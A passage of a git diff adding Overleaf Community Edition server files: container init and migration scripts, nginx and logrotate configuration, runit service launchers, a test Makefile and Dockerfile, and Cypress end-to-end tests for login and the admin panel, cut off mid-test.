+# Up to version 2.5.0 the logs of the contacts service were written into a +# file that was not picked up by logrotate. +# The service is stable and we can safely discard any logs. 
+rm -vf /var/log/overleaf/contacts
diff --git a/server-ce/init_scripts/500_check_db_access.sh b/server-ce/init_scripts/500_check_db_access.sh
new file mode 100755
index 0000000..bbf2b9e
--- /dev/null
+++ b/server-ce/init_scripts/500_check_db_access.sh
@@ -0,0 +1,8 @@
+#!/bin/sh
+set -e
+
+echo "Checking that we can connect to mongo and redis"
+cd /overleaf/services/web
+node modules/server-ce-scripts/scripts/check-mongodb.mjs
+node modules/server-ce-scripts/scripts/check-redis.mjs
+echo "All checks passed"
diff --git a/server-ce/init_scripts/900_run_web_migrations.sh b/server-ce/init_scripts/900_run_web_migrations.sh
new file mode 100755
index 0000000..59b7d23
--- /dev/null
+++ b/server-ce/init_scripts/900_run_web_migrations.sh
@@ -0,0 +1,13 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+if [[ "${OVERLEAF_IS_SERVER_PRO:-null}" == "true" ]]; then
+ environment="server-pro"
+else
+ environment="server-ce"
+fi
+
+echo "Running migrations for $environment"
+cd /overleaf/services/web
+npm run migrations -- migrate -t "$environment"
+echo "Finished migrations"
diff --git a/server-ce/init_scripts/910_check_texlive_images b/server-ce/init_scripts/910_check_texlive_images
new file mode 100755
index 0000000..90dec00
--- /dev/null
+++ b/server-ce/init_scripts/910_check_texlive_images
@@ -0,0 +1,6 @@
+#!/bin/sh
+set -e
+
+echo "Checking texlive images"
+cd /overleaf/services/web
+node modules/server-ce-scripts/scripts/check-texlive-images.mjs
diff --git a/server-ce/init_scripts/910_initiate_doc_version_recovery b/server-ce/init_scripts/910_initiate_doc_version_recovery
new file mode 100755
index 0000000..1daecd3
--- /dev/null
+++ b/server-ce/init_scripts/910_initiate_doc_version_recovery
@@ -0,0 +1,50 @@
+#!/bin/bash
+
+set -euo pipefail
+
+source /etc/container_environment.sh
+source /etc/overleaf/env.sh
+
+LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log
+RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs-5.0.3.log
+
+echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE"
+cd /overleaf/services/history-v1
+LOG_LEVEL=info DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE="$RESYNCS_NEEDED_FILE" node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE"
+
+function resyncAllProjectsInBackground() {
+ waitForService docstore 3016
+ waitForService document-updater 3003
+ waitForService filestore 3009
+ waitForService history-v1 3100
+ waitForService project-history 3054
+ waitForService web-api 4000
+
+ # Resync files that had their versions updated
+ while read -r project_id; do
+ echo "Resyncing project $project_id..."
+ curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true"
+ done < "$RESYNCS_NEEDED_FILE"
+
+ # Resync files that have broken histories
+ /overleaf/bin/force-history-resyncs
+
+ echo "Finished resyncing history for all projects. Adding .done suffix to log file"
+ mv "$RESYNCS_NEEDED_FILE" "$RESYNCS_NEEDED_FILE.done"
+}
+
+function waitForService() {
+ local name=$1
+ local port=$2
+ while ! curl --fail --silent "http://127.0.0.1:$port/status"; do
+ echo "Waiting for $name service to start up"
+ sleep 10
+ done
+}
+
+if [ -f "$RESYNCS_NEEDED_FILE" ]; then
+ echo "Finished recovery of doc versions. Resyncing history for all projects in the background."
+ resyncAllProjectsInBackground &
+else
+ echo "No recovery of doc versions needed."
+fi diff --git a/server-ce/logrotate/overleaf b/server-ce/logrotate/overleaf new file mode 100644 index 0000000..6c6f8d7 --- /dev/null +++ b/server-ce/logrotate/overleaf @@ -0,0 +1,9 @@ +/var/log/overleaf/*.log { + daily + missingok + rotate 5 + compress + copytruncate + notifempty + create 644 root adm +} diff --git a/server-ce/nginx/clsi-nginx.conf b/server-ce/nginx/clsi-nginx.conf new file mode 100644 index 0000000..aac976e --- /dev/null +++ b/server-ce/nginx/clsi-nginx.conf @@ -0,0 +1,61 @@ +# keep in sync with clsi-startup.sh files +# keep in sync with clsi/nginx.conf +# Changes to the above: +# - added debug header +# - remove CORS rules, Server-CE/Server-Pro runs behind a single origin +# - change /output path to /var/lib/overleaf/data/output + +server { + # Extra header for debugging. + add_header 'X-Served-By' 'clsi-nginx' always; + + # Security-Headers + add_header 'X-Content-Type-Options' 'nosniff' always; + add_header 'X-Download-Options' 'noopen' always; + add_header 'X-Frame-Options' 'SAMEORIGIN' always; + add_header 'X-XSS-Protection' '1; mode=block' always; + + listen 8080; + server_name clsi-nginx; + server_tokens off; + access_log off; + # Ignore symlinks possibly created by users + disable_symlinks on; + # enable compression for tex auxiliary files, but not for pdf files + gzip on; + gzip_types text/plain; + gzip_proxied any; + types { + text/plain log blg aux stdout stderr; + application/pdf pdf; + } + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + alias /var/lib/overleaf/data/output/$1-$2/generated-files/$3/output.$4; + } + # handle .blg files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + alias /var/lib/overleaf/data/output/$1-$2/generated-files/$3/$4.blg; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + alias /var/lib/overleaf/data/output/$1/generated-files/$2/output.$3; + } + # handle .blg files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + alias /var/lib/overleaf/data/output/$1/generated-files/$2/$3.blg; + } + + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + # Cache for one day + expires 1d; + alias /var/lib/overleaf/data/output/$1-$2/content/$3; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + # Cache for one day + expires 1d; + alias /var/lib/overleaf/data/output/$1/content/$2; + } +} diff --git a/server-ce/nginx/nginx.conf.template b/server-ce/nginx/nginx.conf.template new file mode 100644 index 0000000..639937f --- /dev/null +++ b/server-ce/nginx/nginx.conf.template @@ -0,0 +1,81 @@ +## ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ## +## ! This file was generated from a template ! ## +## ! See /etc/nginx/templates/ ! ## +## ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! 
## +daemon off; +user www-data; +worker_processes ${NGINX_WORKER_PROCESSES}; +pid /run/nginx.pid; + +events { + worker_connections ${NGINX_WORKER_CONNECTIONS}; + # multi_accept on; +} + +http { + + ## + # Basic Settings + ## + + sendfile on; + tcp_nopush on; + tcp_nodelay on; + keepalive_timeout ${NGINX_KEEPALIVE_TIMEOUT}; + types_hash_max_size 2048; + # server_tokens off; + + # server_names_hash_bucket_size 64; + # server_name_in_redirect off; + + include /etc/nginx/mime.types; + default_type application/octet-stream; + + ## + # Logging Settings + ## + + access_log /var/log/nginx/access.log; + error_log /var/log/nginx/error.log; + + ## + # Gzip Settings + ## + + gzip on; + gzip_disable "msie6"; + gzip_proxied any; # allow upstream server to compress. + + client_max_body_size 50m; + + # gzip_vary on; + # gzip_proxied any; + # gzip_comp_level 6; + # gzip_buffers 16 8k; + # gzip_http_version 1.1; + # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; + + ## + # nginx-naxsi config + ## + # Uncomment it if you installed nginx-naxsi + ## + + #include /etc/nginx/naxsi_core.rules; + + ## + # nginx-passenger config + ## + # Uncomment it if you installed nginx-passenger + ## + + #passenger_root /usr; + #passenger_ruby /usr/bin/ruby; + + ## + # Virtual Host Configs + ## + + include /etc/nginx/conf.d/*.conf; + include /etc/nginx/sites-enabled/*; +} diff --git a/server-ce/nginx/overleaf.conf b/server-ce/nginx/overleaf.conf new file mode 100644 index 0000000..77e59df --- /dev/null +++ b/server-ce/nginx/overleaf.conf @@ -0,0 +1,82 @@ +server { + listen 80; + server_name _; # Catch all, see http://nginx.org/en/docs/http/server_names.html + + root /overleaf/services/web/public/; + + # block external access to prometheus /metrics + location /metrics { + internal; + } + + location / { + proxy_pass http://127.0.0.1:4000; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; + proxy_set_header Host $host; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_read_timeout 10m; + proxy_send_timeout 10m; + } + + location /socket.io { + proxy_pass http://127.0.0.1:3026; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; + proxy_set_header Host $host; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_read_timeout 10m; + proxy_send_timeout 10m; + } + + location /stylesheets { + expires 1y; + } + + location /minjs { + expires 1y; + } + + location /img { + expires 1y; + } + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + 
proxy_http_version 1.1; + } + + # block external access to metrics + location ~* ^/metrics/?$ { + return 404 'Not found'; + } + + # block external access to all health checks /health_check, /health_check/full, etc + location ~* ^/health_check { + return 404 'Not found'; + } + + # Load any extra configuration for this vhost + include /etc/nginx/vhost-extras/overleaf/*.conf; +} diff --git a/server-ce/runit/chat-overleaf/run b/server-ce/runit/chat-overleaf/run new file mode 100755 index 0000000..ea91753 --- /dev/null +++ b/server-ce/runit/chat-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - chat" + NODE_PARAMS="--inspect=0.0.0.0:30100" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/overleaf/chat.log 2>&1 diff --git a/server-ce/runit/clsi-overleaf/run b/server-ce/runit/clsi-overleaf/run new file mode 100755 index 0000000..ece2031 --- /dev/null +++ b/server-ce/runit/clsi-overleaf/run @@ -0,0 +1,21 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - clsi" + NODE_PARAMS="--inspect=0.0.0.0:30130" +fi + +# Set permissions on docker.sock if present, +# To enable sibling-containers (see entrypoint.sh in clsi project) +if [ -e '/var/run/docker.sock' ]; then + echo ">> Setting permissions on docker socket" + DOCKER_GROUP=$(stat -c '%g' /var/run/docker.sock) + groupadd --non-unique --gid "${DOCKER_GROUP}" dockeronhost + usermod -aG dockeronhost www-data +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/overleaf/clsi.log 2>&1 diff --git a/server-ce/runit/contacts-overleaf/run b/server-ce/runit/contacts-overleaf/run new file mode 100755 index 0000000..8844f66 --- /dev/null +++ b/server-ce/runit/contacts-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - contacts" + NODE_PARAMS="--inspect=0.0.0.0:30360" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/overleaf/contacts.log 2>&1 diff --git a/server-ce/runit/docstore-overleaf/run b/server-ce/runit/docstore-overleaf/run new file mode 100755 index 0000000..b8166d1 --- /dev/null +++ b/server-ce/runit/docstore-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - docstore" + NODE_PARAMS="--inspect=0.0.0.0:30160" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> /var/log/overleaf/docstore.log 2>&1 diff --git a/server-ce/runit/document-updater-overleaf/run b/server-ce/runit/document-updater-overleaf/run new file mode 100755 index 0000000..0cd485b --- /dev/null +++ b/server-ce/runit/document-updater-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - document updater" + NODE_PARAMS="--inspect=0.0.0.0:30030" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/overleaf/document-updater.log 2>&1 diff --git a/server-ce/runit/filestore-overleaf/run 
b/server-ce/runit/filestore-overleaf/run new file mode 100755 index 0000000..66329e9 --- /dev/null +++ b/server-ce/runit/filestore-overleaf/run @@ -0,0 +1,6 @@ +#!/bin/bash + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/overleaf/filestore.log 2>&1 diff --git a/server-ce/runit/history-v1-overleaf/run b/server-ce/runit/history-v1-overleaf/run new file mode 100755 index 0000000..15979fa --- /dev/null +++ b/server-ce/runit/history-v1-overleaf/run @@ -0,0 +1,9 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - history-v1" + NODE_PARAMS="--inspect=0.0.0.0:30640" +fi + +NODE_CONFIG_DIR=/overleaf/services/history-v1/config exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/history-v1/app.js >> /var/log/overleaf/history-v1.log 2>&1 diff --git a/server-ce/runit/nginx/run b/server-ce/runit/nginx/run new file mode 100755 index 0000000..9eacfb4 --- /dev/null +++ b/server-ce/runit/nginx/run @@ -0,0 +1,2 @@ +#!/bin/bash +exec nginx \ No newline at end of file diff --git a/server-ce/runit/notifications-overleaf/run b/server-ce/runit/notifications-overleaf/run new file mode 100755 index 0000000..1d0f2c8 --- /dev/null +++ b/server-ce/runit/notifications-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - notifications" + NODE_PARAMS="--inspect=0.0.0.0:30420" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/overleaf/notifications.log 2>&1 diff --git a/server-ce/runit/project-history-overleaf/run b/server-ce/runit/project-history-overleaf/run new file mode 100755 index 0000000..fe1a6bd --- /dev/null +++ b/server-ce/runit/project-history-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - project-history" + NODE_PARAMS="--inspect=0.0.0.0:30540" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/overleaf/project-history.log 2>&1 diff --git a/server-ce/runit/real-time-overleaf/run b/server-ce/runit/real-time-overleaf/run new file mode 100755 index 0000000..8081dd7 --- /dev/null +++ b/server-ce/runit/real-time-overleaf/run @@ -0,0 +1,6 @@ +#!/bin/bash + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/overleaf/real-time.log 2>&1 diff --git a/server-ce/runit/web-api-overleaf/run b/server-ce/runit/web-api-overleaf/run new file mode 100755 index 0000000..9aafc53 --- /dev/null +++ b/server-ce/runit/web-api-overleaf/run @@ -0,0 +1,14 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - web-api" + NODE_PARAMS="--inspect=0.0.0.0:30000" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=0.0.0.0 +export ENABLED_SERVICES="api" +export METRICS_APP_NAME="web-api" + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/web/app.mjs >> /var/log/overleaf/web-api.log 2>&1 diff --git a/server-ce/runit/web-overleaf/run b/server-ce/runit/web-overleaf/run new file mode 100755 index 0000000..438328a --- /dev/null +++ b/server-ce/runit/web-overleaf/run @@ -0,0 +1,14 @@ +#!/bin/bash + 
+NODE_PARAMS=""
+if [ "$DEBUG_NODE" == "true" ]; then
+ echo "running debug - web"
+ NODE_PARAMS="--inspect=0.0.0.0:40000"
+fi
+
+source /etc/overleaf/env.sh
+export LISTEN_ADDRESS=127.0.0.1
+export ENABLED_SERVICES="web"
+export WEB_PORT="4000"
+
+exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/web/app.mjs >> /var/log/overleaf/web.log 2>&1
diff --git a/server-ce/services.js b/server-ce/services.js
new file mode 100644
index 0000000..d0b0a9c
--- /dev/null
+++ b/server-ce/services.js
@@ -0,0 +1,41 @@
+module.exports = [
+ {
+ name: 'web',
+ },
+ {
+ name: 'real-time',
+ },
+ {
+ name: 'document-updater',
+ },
+ {
+ name: 'clsi',
+ },
+ {
+ name: 'filestore',
+ },
+ {
+ name: 'docstore',
+ },
+ {
+ name: 'chat',
+ },
+ {
+ name: 'contacts',
+ },
+ {
+ name: 'notifications',
+ },
+ {
+ name: 'project-history',
+ },
+ {
+ name: 'history-v1',
+ },
+]
+
+if (require.main === module) {
+ for (const service of module.exports) {
+ console.log(service.name)
+ }
+}
diff --git a/server-ce/test/.gitignore b/server-ce/test/.gitignore
new file mode 100644
index 0000000..56be476
--- /dev/null
+++ b/server-ce/test/.gitignore
@@ -0,0 +1,2 @@
+data/
+docker-mailtrap/
diff --git a/server-ce/test/Dockerfile b/server-ce/test/Dockerfile
new file mode 100644
index 0000000..721b99c
--- /dev/null
+++ b/server-ce/test/Dockerfile
@@ -0,0 +1,8 @@
+FROM node:20.18.2
+RUN curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add - \
+&& echo \
+ "deb [arch=$(dpkg --print-architecture)] https://download.docker.com/linux/debian $(. /etc/os-release && echo "$VERSION_CODENAME") stable" \
+ > /etc/apt/sources.list.d/docker.list \
+&& apt-get update \
+&& apt-get install -y docker-ce-cli docker-compose-plugin \
+&& rm -rf /var/lib/apt/lists/*
diff --git a/server-ce/test/Makefile b/server-ce/test/Makefile
new file mode 100644
index 0000000..18f4446
--- /dev/null
+++ b/server-ce/test/Makefile
@@ -0,0 +1,63 @@
+all: test-e2e
+
+# We are updating the docker compose config via the host-admin service.
+# The host-admin service is running inside docker and has its own file-system layout.
+# We need to have both file-system layouts agree on the path for the docker compose project.
+# Notably, the container labels com.docker.compose.project.working_dir and com.docker.compose.project.config_files need to match when creating containers from the docker host (how you started things) and from host-admin (how tests reconfigure the instance).
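+# For illustration (hypothetical container name), both label values can be read with:
+#   docker inspect --format '{{ index .Config.Labels "com.docker.compose.project.working_dir" }}' test-sharelatex-1
+#   docker inspect --format '{{ index .Config.Labels "com.docker.compose.project.config_files" }}' test-sharelatex-1
+# They must agree between the docker host and host-admin, hence the pinned PWD export below.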
+export PWD = $(shell pwd) + +export TEX_LIVE_DOCKER_IMAGE ?= gcr.io/overleaf-ops/texlive-full:2023.1 +export ALL_TEX_LIVE_DOCKER_IMAGES ?= gcr.io/overleaf-ops/texlive-full:2023.1,gcr.io/overleaf-ops/texlive-full:2022.1 +export IMAGE_TAG_PRO ?= us-east1-docker.pkg.dev/overleaf-ops/ol-docker/pro:latest +export CYPRESS_SHARD ?= +export COMPOSE_PROJECT_NAME ?= test + +test-e2e-native: + docker compose -f docker-compose.yml -f docker-compose.native.yml up --no-log-prefix sharelatex host-admin -d + CYPRESS_HOST_ADMIN_URL='http://localhost:8081' \ + CYPRESS_SAML_URL='http://localhost:8082' \ + CYPRESS_MAILTRAP_URL='http://localhost:8083' \ + npm run cypress:open + +test-e2e: + docker compose up --no-log-prefix --exit-code-from=e2e e2e + +test-e2e-open: + docker compose up --no-log-prefix --exit-code-from=e2e-open e2e-open + +clean: + docker compose down --volumes --timeout 0 + +prefetch: prefetch_default +prefetch_default: prefetch_default_compose +prefetch_default_compose: + docker compose pull e2e mongo redis + +prefetch_default: prefetch_default_compose_build +prefetch_default_compose_build: + docker compose build host-admin + +prefetch: prefetch_custom +prefetch_custom: prefetch_custom_compose_pull +prefetch_custom_compose_pull: + docker compose pull saml ldap + +prefetch_custom: prefetch_custom_texlive +prefetch_custom_texlive: + echo "$$ALL_TEX_LIVE_DOCKER_IMAGES" | tr ',' '\n' | xargs -I% \ + sh -exc 'tag=%; re_tag=quay.io/sharelatex/$${tag#*/*/}; docker pull $$tag; docker tag $$tag $$re_tag' + +prefetch_custom: prefetch_old +prefetch_old: + docker pull $(IMAGE_TAG_PRO:latest=4.2) + docker pull $(IMAGE_TAG_PRO:latest=5.0.1-RC1) + docker pull $(IMAGE_TAG_PRO:latest=5.0) + +# Google Cloud Build runs on a very ancient Docker version that does not support the subdir flag. +# Use services -> mailtrap -> build -> context = https://github.com/dbck/docker-mailtrap.git#v1.5.0:build in docker-compose.yml eventually. 
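+# A sketch of that eventual stanza (untested, assuming a Compose version with subdir-context support):
+#   services:
+#     mailtrap:
+#       build:
+#         context: https://github.com/dbck/docker-mailtrap.git#v1.5.0:build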
+prefetch_default_compose_build: build_mailtrap +build_mailtrap: + git clone https://github.com/dbck/docker-mailtrap.git || true && cd docker-mailtrap && git checkout v1.5.0 + docker build -t mailtrap docker-mailtrap/build + +.PHONY: test-e2e test-e2e-open diff --git a/server-ce/test/accounts.spec.ts b/server-ce/test/accounts.spec.ts new file mode 100644 index 0000000..eeeb104 --- /dev/null +++ b/server-ce/test/accounts.spec.ts @@ -0,0 +1,38 @@ +import { createMongoUser, ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('Accounts', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + + it('can log in and out', function () { + login('user@example.com') + cy.visit('/project') + cy.findByText('Account').click() + cy.findByText('Log Out').click() + cy.url().should('include', '/login') + cy.visit('/project') + cy.url().should('include', '/login') + }) + + it('should render the email on the user activate screen', () => { + const email = 'not-activated-user@example.com' + cy.then(async () => { + const { url } = await createMongoUser({ email }) + return url + }).as('url') + cy.get('@url').then(url => { + cy.visit(`${url}`) + cy.url().should('contain', '/user/activate') + cy.findByText('Please set a password') + cy.get('input[autocomplete="username"]').should( + 'have.attr', + 'value', + email + ) + cy.get('input[name="password"]') + cy.findByRole('button', { name: 'Activate' }) + }) + }) +}) diff --git a/server-ce/test/admin.spec.ts b/server-ce/test/admin.spec.ts new file mode 100644 index 0000000..18b33c6 --- /dev/null +++ b/server-ce/test/admin.spec.ts @@ -0,0 +1,327 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { + activateUser, + createMongoUser, + ensureUserExists, + login, +} from './helpers/login' +import { v4 as uuid } from 'uuid' +import { createProject } from './helpers/project' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' +import { openEmail } from './helpers/email' + +describe('admin panel', function () { + function registrationTests() { + it('via GUI and opening URL manually', () => { + const user = `${uuid()}@example.com` + cy.get('input[name="email"]').type(user + '{enter}') + + cy.get('td') + .contains(/\/user\/activate/) + .then($td => { + const url = $td.text().trim() + activateUser(url) + }) + }) + + it('via GUI and email', () => { + const user = `${uuid()}@example.com` + cy.get('input[name="email"]').type(user + '{enter}') + + let url: string + cy.get('td') + .contains(/\/user\/activate/) + .then($td => { + url = $td.text().trim() + }) + + cy.then(() => { + openEmail( + 'Activate your Overleaf Community Edition Account', + (frame, { url }) => { + frame.contains('Set password').then(el => { + expect(el.attr('href')!).to.equal(url) + }) + }, + { url } + ) + // Run activateUser in the main origin instead of inside openEmail. See docs on openEmail. 
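+ // (openEmail appears to run its callback in a separate origin, e.g. via
+ // cy.origin, where closures from this spec are unavailable; hence the url
+ // is passed in explicitly as the { url } argument above.)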
+ activateUser(url) + }) + }) + it('via script and opening URL manually', () => { + const user = `${uuid()}@example.com` + let url: string + cy.then(async () => { + ;({ url } = await createMongoUser({ email: user })) + }) + cy.then(() => { + activateUser(url) + }) + }) + it('via script and email', () => { + const user = `${uuid()}@example.com` + let url: string + cy.then(async () => { + ;({ url } = await createMongoUser({ email: user })) + }) + cy.then(() => { + openEmail( + 'Activate your Overleaf Community Edition Account', + (frame, { url }) => { + frame.contains('Set password').then(el => { + expect(el.attr('href')!).to.equal(url) + }) + }, + { url } + ) + // Run activateUser in the main origin instead of inside openEmail. See docs on openEmail. + activateUser(url) + }) + }) + } + + describe('in CE', () => { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({ pro: false, version: 'latest' }) + const admin = 'admin@example.com' + const user = `user+${uuid()}@example.com` + ensureUserExists({ email: admin, isAdmin: true }) + ensureUserExists({ email: user }) + + describe('create users', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Users').click() + }) + registrationTests() + }) + }) + + describe('in server pro', () => { + const admin = 'admin@example.com' + const user1 = 'user@example.com' + const user2 = 'user2@example.com' + + let testProjectName = '' + let testProjectId = '' + let deletedProjectName = '' + let projectToDeleteId = '' + + const findProjectRow = (projectName: string) => { + cy.log('find project row') + return cy.findByText(projectName).parent().parent() + } + + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ + pro: true, + }) + ensureUserExists({ email: admin, isAdmin: true }) + ensureUserExists({ email: user1 }) + ensureUserExists({ email: user2 }) + + beforeWithReRunOnTestRetry(() => { + testProjectName = `project-${uuid()}` + deletedProjectName = `deleted-project-${uuid()}` + login(user1) + createProject(testProjectName, { open: false }).then( + id => (testProjectId = id) + ) + createProject(deletedProjectName, { open: false }).then( + id => (projectToDeleteId = id) + ) + }) + + describe('manage site', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Site').click() + }) + + it('publish and clear admin messages', () => { + const message = 'Admin Message ' + uuid() + + cy.log('create system message') + cy.get('[role="tab"]').contains('System Messages').click() + cy.get('input[name="content"]').type(message) + cy.get('button').contains('Post Message').click() + cy.findByText(message) + + login(user1) + cy.visit('/project') + cy.findByText(message) + + cy.log('clear system messages') + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Site').click() + cy.get('[role="tab"]').contains('System Messages').click() + cy.get('button').contains('Clear all messages').click() + + cy.log('verify system messages are no longer displayed') + login(user1) + cy.visit('/project') + cy.findByText(message).should('not.exist') + }) + }) + + describe('manage users', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Users').click() + }) + + describe('create users', () => { + beforeEach(() => { + 
cy.get('a').contains('New User').click()
+        })
+        registrationTests()
+      })
+
+      it('user list RegExp search', () => {
+        cy.get('input[name="isRegExpSearch"]').click()
+        cy.get('input[name="email"]').type('user[0-9]{enter}')
+        cy.findByText(user2)
+        cy.findByText(user1).should('not.exist')
+      })
+    })
+
+    describe('user page', () => {
+      beforeEach(() => {
+        login(admin)
+        cy.visit('/project')
+        cy.get('nav').findByText('Admin').click()
+        cy.get('nav').findByText('Manage Users').click()
+        cy.get('input[name="email"]').type(user1 + '{enter}')
+        cy.findByText(user1).click()
+        cy.url().should('match', /\/admin\/user\/[a-fA-F0-9]{24}/)
+      })
+
+      it('displays expected tabs', () => {
+        const tabs = [
+          'User Info',
+          'Projects',
+          'Deleted Projects',
+          'Audit Log',
+          'Sessions',
+        ]
+        cy.get('[role="tab"]').each((el, index) => {
+          cy.wrap(el).findByText(tabs[index]).click()
+        })
+        cy.get('[role="tab"]').should('have.length', tabs.length)
+      })
+
+      describe('user info tab', () => {
+        beforeEach(() => {
+          cy.get('[role="tab"]').contains('User Info').click()
+        })
+
+        it('displays required sections', () => {
+          // not an exhaustive list, checks that the tab content is rendered
+          cy.findByText('Profile')
+          cy.findByText('Editor Settings')
+        })
+
+        it('should not display SaaS-only sections', () => {
+          cy.findByText('Referred User Count').should('not.exist')
+          cy.findByText('Split Test Assignments').should('not.exist')
+          cy.findByText('Experimental Features').should('not.exist')
+          cy.findByText('Service Integration').should('not.exist')
+          cy.findByText('SSO Integrations').should('not.exist')
+          cy.findByText('Security').should('not.exist')
+        })
+      })
+
+      it('transfer project ownership', () => {
+        cy.log("access project admin through the owner's project list")
+        cy.get('[role="tab"]').contains('Projects').click()
